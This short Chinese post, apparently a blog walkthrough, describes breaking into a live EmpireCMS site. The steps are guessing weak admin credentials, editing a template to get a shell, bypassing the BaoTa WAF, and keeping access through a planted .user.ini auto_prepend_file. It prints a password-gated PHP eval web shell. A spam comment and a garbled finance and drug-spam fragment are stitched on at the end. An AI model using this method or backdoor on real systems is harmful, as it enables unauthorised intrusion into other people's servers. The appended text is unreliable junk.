今天有个朋友发了一个目标站过来
简单的信息收集一下
发现是一个帝国的cms
帝国的默认后台是/e/admin/
发现对上了 随手测试了一下 admin admin
admin admin123
结果发现123进去了
Getshell
众所周知帝国的getshell 直接在模板处就可以了
然后我们随便找个动态模板来改一下
哎 好玩的东西来了居然有宝塔的waf 刚好前两天发了一个绕过宝塔的waf的代码
不知道的小伙伴可以移步到这里取代码 绕过宝塔WAF
但是有一点要注意 动态模板的里面的代码一定要备份 因为他模板里面的所有代码都过不了宝塔的防火墙 所以我们需要清空里面的
然后在写上自己的绕过代码 然后访问一下 就下载到同目录下了
维护权限
我一般会选择在/e/目录下做一个.user.ini
文件名:.user.ini
内容:
auto_prepend_file=/tmp/sesss_024em2desjoj12a2qnaf29q2a2
先去tmp目录创建一个文件名为:sesss_024em2desjoj12a2qnaf29q2a2 然后在去/e/目录创建一个.user.ini 要不然会炸的
反正我是比较喜欢写这一段
<?php
if(@$_GET['pass']== 'q'){
@eval($_POST['q']);
}
?>
Awesome! Its genuinely amazing piece of writing, I have got much clear idea about from this paragraph.
Issuer services logged a strong increase of 24 relative to 1Q 13 due to increased corporate actions and technology reimbursements clomid by avents We are therefore revising our estimate to be 2